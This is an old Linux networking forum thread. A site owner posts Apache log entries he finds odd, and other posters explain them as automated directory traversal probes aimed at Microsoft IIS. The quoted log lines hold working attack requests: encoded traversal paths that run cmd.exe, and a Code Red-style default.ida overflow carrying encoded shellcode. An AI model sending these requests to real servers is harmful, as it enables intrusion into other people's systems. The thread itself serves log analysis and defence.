LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Networking (https://www.linuxquestions.org/questions/linux-networking-3/)
-   -   apache logs, seeing weird things (https://www.linuxquestions.org/questions/linux-networking-3/apache-logs-seeing-weird-things-133055/)

sal_paradise42 01-09-2004 09:36 AM
apache logs, seeing weird things
 
just been looking at my apache access logs and I am noticing some weird stuff on it, when I see the date I have no idea who is getting into it or whats going on, and I have my site password protected so no one should be in it.
I will post the log, can someone see anything from it?
log ------------------------------------------------------------------------------------------

24.1.1x.x - - [09/Jan/2004:06:27:46 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:46 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:46 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1xx - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 468
24.1.1x.x - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459
24.1.1x.x - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459
24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.1.x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634
24.218.x.x - - [09/Jan/2004:07:18:28 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 401 634

peter_robb 01-09-2004 09:41 AM
Not too much to worry about..
It's called a Directory traversal attack aimed at a M$ server, quite harmless to you.

One look at the reply headers you have sent them and they will write you off their "possible" list.

sal_paradise42 01-09-2004 01:35 PM
thanks for the quick response, I won't worry about it then.

dubman 01-09-2004 04:45 PM
yep, this is what you call "script kiddies"


All times are GMT -5. The time now is 07:21 PM.